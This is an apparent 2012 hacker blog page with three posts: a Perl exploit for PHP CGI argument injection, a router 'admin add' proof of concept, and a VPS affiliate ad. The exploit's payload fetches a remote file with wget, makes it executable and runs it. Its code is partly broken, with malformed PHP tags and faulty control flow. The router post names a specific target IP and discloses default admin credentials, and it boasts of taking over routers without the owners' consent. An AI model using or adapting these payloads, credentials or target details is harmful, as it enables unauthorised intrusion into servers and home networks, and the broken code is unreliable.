Help pay for xds lawyer fees.
LR

[Exploit Updated]: PHP CGI – executes a payload wich is php shellexec(); ,My 3rd PERL expl…

Posted on 6th May 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

Done this, but, this is only a basic version wich, i guess does things in a nice way :)

it is my 3rd perl exploit , so pls dont bash me, any fixes etc would be appreciated BUT remember it is using the RIGHT method, ie: injecting php by shellexec()

wich IS a PHP CGI function, and the ONLY way it Will definately exec!

ALSO this CAN execute cmds ofc, i will addin a line if you wish to do this.. ok…

Ok now on with the show….

 


#!/usr/bin/perl
 ## PHP CGI exec-cmd/injection of code thru php tags by (xd)

###Greetz: My channel on efnet / #Haxnet , ppl @ps in it

###greetz#1: tropic,dolphin,galaxy,Mouse_,MeOwie,nme,Meta,roy-ITUG,rotor/aussies,even iCER ya prick :P 

###and pt.2: FUZi0N,Motd/AlbaHack,Serh/RoHack,l3th4l/smashthestack.org,gizmore/wechall.net (Best 2 wargames around!)

###and pt3: storm, ev0, insid, worldwide (yea my juped nick thx to a fbi infomant named: krashed ,but ya'll know tht ;;))

###and pt 4: fuckwitz , zeu ,and hell, i cant rmember ya all but, you know who ya are, the ppl who contribute and help.. i <3 yas..

###Crews: AB (My mentors,inspirators.. <3) , Br Hackers and the BR AnonOps/Antisec team,AlbaHack,RoHack,DARPA (still love most of yas BUT ONE!) <3 peanuter ..comeback br0)

### MAJOR fuckage to ONLY one: krashed / [krashed] - motherfucker, YOUR TIME is come!!
use IO::Socket;
use Socket;

if (@ARGV<2) {
print "Usage: $0 <host>\n";
print "OPTIONAL CMD USE BUT DISABLED : [Ex: id]>\n";
exit(-1);
}

##my $cmd_exec_payload = "<php? system($_GET[\'$cmd\']); ?>";  ## Optional
my $payload = "<php? shellexec(wget -q http://fbi.gov/0day.txt;chmod +x 0day.txt;perl -e 0day.txt); ?>";  ## Config here

my $host=$ARGV[0];
my $cmd=$ARGV[1];
my($host, $cmd) = @ARGV or usage();

sub Connect {
print "[+] Connecting ..\n";
$sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] Connect Error ..\n";
exit(-1);
}

$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $payload ." HTTP/1.1\r\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "\n\n";

##$cmd = "POST http://". $host ."//cgi-bin/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3D". $cmd_exec_payload ." HTTP/1.1\r\n";
##print $sock "Host: $host\n";
##print $sock "Accept: */*\n";
##print $sock "\n\n";

while () {
$rp = rand;
&Connect;
print "[+] Executing command exec payload thru php-shellexec: ( $cmd ) ..\n";
my $answer=0;
print $sock;
if ($sock) {
print "[+] Sent evilcode,running: ( $cmd ) ..\n";
while ($answer=<$sock>) {
print $answer;
print results "[*] Server reply: ( $answer ) ..\n";
}
}
}

Enjoy / xd–

comments: 0 » tags: , , , , , , ,

PoC : WindWeb/2.0 Server admin add exploit , carnage for ANY .kr/.tw ! Kep pvt for 5yrs… being leaked well, we owned them now, you can try reown them :P~

Posted on 1st May 2012 in Android, Codes, Exploits, Papers, Uncategorized

ill make it short and sweet, but, i can tell you NOW, this is useable across MANY routers, and yes, it DOES matter on some routers if they enable or disable ports 80/443 ,inwich netgear, and obviously this brand , doesnt :P

Here we go… to add an admin or just overwrite one: Info details for exploit / jmp point and server error for gdb … have fun!


like , you will need to find your OWn index.html , as this MUSt be simply, changed, so, when you find, an exmaple would be to scan 220.76.* range.. then, learn some about routers, find a WindWeb, then it should be in
theyre admin page BUT this is accessed remotely... and, locally then after you change the pass ... i doubt many opers even change router passes once set....so you make abs no logs really... nothing shows to them unless it is some hi duty server :s
so yes, it can very VERY nice... but im not going to handout a *how to* on finding them... simple. find em yaself!
220.76.166.73:80 / was this box btw... so, as you see, 220 , is obv an adsl range and yea, what stupid ass server, runs a router ad ion port 80 ? THIS ONE! bahha

Did we contact them, umm no, did they pay us to do any work for them...so no.

///////////////////PoC By xd and dd0k/anemic
Server: WindWeb/2.0  Connection: close  Content-Type: text/html
Web Server Error Report:
Server Error: 501 Not Implemented
Operating System Error Nr:3997697:
errno = 0x3d0001

///Notes: .korean HOME routers/BIZ routers ALL affected - noted: 4mb and fast on the adsl alone.. not bad for HOME! 4meg/s!

<content="text/html; charset=euc-kr">
<SCRIPT LANGUAGE="JavaScript">
var st_lan_ip = new Array(4)
var st_lan_subnet = new Array(4)
var st_lan_mac = new Array(4)
st_lan_ip[0] = "192.168.1.1"
st_lan_subnet[0] = "255.255.255.0"
st_lan_mac[0] = "00:05:C6:3A:1A:45"
var st_lan_active = "1"
<!--
var id = new Array();
id[0]="adsl"
id[1]="user"

var pass = new Array();
pass[0]="megapass"
pass[1]="megapass"

// will make login on the localhost/ user:adsl pass:megapass
comments: 0 » tags: , , , , , , , , , ,

VPS Hosting at 9.95 a/mo, VERY nice setups! Use AFF Link to get better deals/support!

Posted on 26th November 2011 in Android, Codes, Exploits, Papers, Uncategorized

SIGNUP HERE -> http://www.vr.org/aff.php?aff=551

Just to point out an awesome VPS hosting place, i currently have 2 boxes at, and who have the BEST customer support i have ever found!
The company is HostVirtual , a 11 location company, with datacenters opening now in Asia, wich is super-fast fiber lines.
Folks, this company is going places.. Also hosting warchall.net , and MANY other sites/shells!
They cater for all, have awesome service, and it is CLOUDS, you get what you pay for, they cannot cheat because xen-cloud, limits usage, accordingly…where openvz, does not. This is why, when your looking at your next Openvz box, check howmuch ram and burstable-ram you get..then check even… you will be shocked :>
This companys boxes are all Xeon QuadCore Highend side of town stuff, aweesome highspeed blades,all with extra fine DDoS protection!

Please use the AFFILIATE link http://www.vr.org/aff.php?aff=551 , and then you can use the hand of god to summon xd– on Efnet for support, or simply submit a ticket!

These boxes are worth it.. initial signup is only 4.31!
Existing customers, get 10% off each ‘instance’ wich is about 8bux for making another VPS… very handy :)

http://www.vr.org/aff.php?aff=551

comments: 3 » tags: